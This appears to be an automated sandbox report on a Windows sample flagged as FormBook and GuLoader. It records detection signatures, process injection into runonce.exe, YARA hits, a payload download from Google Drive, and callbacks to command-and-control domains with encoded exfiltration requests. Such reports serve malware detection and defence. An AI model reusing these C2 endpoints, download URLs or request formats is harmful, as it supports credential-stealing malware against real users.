Windows Analysis Report
ulACwpUCSU.exe

Overview

General Information

Sample name:ulACwpUCSU.exe
Analysis ID:1451688
MD5:b6f8b1c89399490857facfcf5bb78d86
SHA1:898e59e55c027c47833f435fff28ed20da9ecdc8
SHA256:c4c7ed9360322bf463828c0e86a131a081ecc700fe32dc0215d392251771a6de
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • ulACwpUCSU.exe (PID: 8608 cmdline: "C:\Users\user\Desktop\ulACwpUCSU.exe" MD5: B6F8B1C89399490857FACFCF5BB78D86)
    • ulACwpUCSU.exe (PID: 3220 cmdline: "C:\Users\user\Desktop\ulACwpUCSU.exe" MD5: B6F8B1C89399490857FACFCF5BB78D86)
      • eUbiubZkrHdFTtCYB.exe (PID: 868 cmdline: "C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • runonce.exe (PID: 3444 cmdline: "C:\Windows\SysWOW64\runonce.exe" MD5: 7430CCC7226A6FF76B6D55B96F6CE53C)
          • eUbiubZkrHdFTtCYB.exe (PID: 7152 cmdline: "C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1204 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: D1CC73370B9EF7D74E6D9FD9248CD687)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
        No Sigma rule has matched


        AV Detection

        Source: ulACwpUCSU.exe | Avira: detected
        Source: www.barrettdigitalart.com | Sophos S4: Label: malware callhome domain
        Source: http://www.barrettdigitalart.com/a8pp/ | Sophos S4: Label: malware callhome domain
        Source: http://www.barrettdigitalart.com/a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL | Sophos S4: Label: malware callhome domain
        Source: ulACwpUCSU.exe | ReversingLabs: Detection: 65%
        Source: ulACwpUCSU.exe | Virustotal: Detection: 35%
        Source: Yara match | File source: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.3044504432.00000000373A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.7373930298.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.7373346387.00000000037A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: ulACwpUCSU.exe | Joe Sandbox ML: detected
        Source: ulACwpUCSU.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknown | HTTPS traffic detected: 142.250.217.174:443 -> 192.168.11.30:49792 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 142.250.217.193:443 -> 192.168.11.30:49793 version: TLS 1.2
        Source: ulACwpUCSU.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: runonce.pdbGCTL source: ulACwpUCSU.exe, 00000003.00000003.2981655894.00000000075B6000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: ulACwpUCSU.exe, 00000003.00000003.2919856507.0000000037365000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: ulACwpUCSU.exe, ulACwpUCSU.exe, 00000003.00000003.2919856507.0000000037365000.00000004.00000020.00020000.00000000.sdmp, runonce.exe
        Source: Binary string: mshtml.pdbUGP source: ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: runonce.pdb source: ulACwpUCSU.exe, 00000003.00000003.2981655894.00000000075B6000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\ulACwpUCSU.exe | Code function: 0_2_0040603A FindFirstFileA,FindClose,0_2_0040603A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exe | Code function: 0_2_004055F6 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055F6
        Source: C:\Users\user\Desktop\ulACwpUCSU.exe | Code function: 0_2_00402645 FindFirstFileA,0_2_00402645
        Source: C:\Windows\SysWOW64\runonce.exe | Code function: 5_2_0310BA90 FindFirstFileW,FindNextFileW,FindClose,5_2_0310BA90
        Source: C:\Windows\SysWOW64\runonce.exe | Code function: 4x nop then xor eax, eax | 5_2_030F9440
        Source: C:\Windows\SysWOW64\runonce.exe | Code function: 4x nop then pop edi | 5_2_03101F80
        Source: C:\Windows\SysWOW64\runonce.exe | Code function: 4x nop then pop edi | 5_2_030FDCB1

        Networking

        Source: DNS query: www.astralavenue.xyz
        Source: Joe Sandbox View | IP Address: 162.240.81.18
        Source: Joe Sandbox View | IP Address: 162.0.237.22
        Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
        Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS
        Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
        Source: Joe Sandbox View | ASN Name: NBS11696US
        Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=17gm-wgqB94fKwcr7ZsHzQiLhRxM6222H HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /download?id=17gm-wgqB94fKwcr7ZsHzQiLhRxM6222H&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.shootprecious.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=eq13gBt76ePDaE9jPC0A9Iupd/gjzDBrOAbtoaeLD+8wGtFf895L9qocKFTqmVpd7xt5UEIOF7l9ga++P+8IeJMZhOURtvON+WXuvIh3J+ggFIDS+M1ogAg=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.cyberpsychsecurity.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=OIafhQlqd3+U0X685uCjXpA/yYYLTXRf5vcl7I4tT0pe2zvQLHkCRhCjRsaaEiaqAczN9yym/x5p7g+8tSCureiRSn+8K4wSoicHodjwuTrKVPMbvJXSPao=&80k=Qv4d HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.vgjimei.icuConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: unknownHTTP traffic detected: POST /a8pp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enHost: www.blissfulbooks.onlineOrigin: http://www.blissfulbooks.onlineReferer: http://www.blissfulbooks.online/a8pp/Content-Length: 205Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 32 4e 6c 68 48 4c 53 38 3d 6d 32 31 49 44 42 52 54 43 38 61 48 55 37 44 4b 78 62 73 55 37 38 73 55 67 66 2b 72 42 64 65 52 53 6d 52 37 62 41 64 39 49 46 47 48 68 70 42 49 61 7a 43 53 50 42 41 4e 54 2f 45 4d 71 4f 77 2f 4a 44 2f 4f 6d 32 65 56 50 30 2b 74 71 63 67 43 62 4e 61 7a 6a 33 50 4c 47 66 63 35 34 35 67 4e 38 2b 57 5a 55 77 58 56 68 69 78 38 4a 7a 35 7a 33 36 66 43 52 31 32 43 5a 62 67 37 42 53 33 37 72 62 69 49 41 31 48 4f 67 6b 65 36 2b 2b 67 78 59 4a 5a 4b 32 74 4a 50 5a 72 43 4b 71 6f 56 52 61 4d 4f 6b 64 51 52 33 6a 53 39 4a 4b 72 59 65 79 62 6d 49 44 6e 31 34 65 65 30 4f 55 6d 50 34 48 67 3d 3d Data Ascii: 2NlhHLS8=m21IDBRTC8aHU7DKxbsU78sUgf+rBdeRSmR7bAd9IFGHhpBIazCSPBANT/EMqOw/JD/Om2eVP0+tqcgCbNazj3PLGfc545gN8+WZUwXVhix8Jz5z36fCR12CZbg7BS37rbiIA1HOgke6++gxYJZK2tJPZrCKqoVRaMOkdQR3jS9JKrYeybmIDn14ee0OUmP4Hg==
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:35:43 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:35:46 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:35:49 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:35:51 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jun 2024 12:37:37 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 
20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jun 2024 12:37:39 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 
20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 04 Jun 2024 12:37:42 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "636d2d22-e42"
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 04 Jun 2024 12:37:45 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "636d2d22-e42"
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 04 Jun 2024 12:37:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-cache Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 04 Jun 2024 12:37:55 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-cache Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 04 Jun 2024 12:37:58 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-cache Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 04 Jun 2024 12:38:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-cache
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:39:09 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:39:11 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:39:14 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:39:17 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 04 Jun 2024 12:40:35 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-cache Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 04 Jun 2024 12:40:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-cache Content-Encoding: gzip
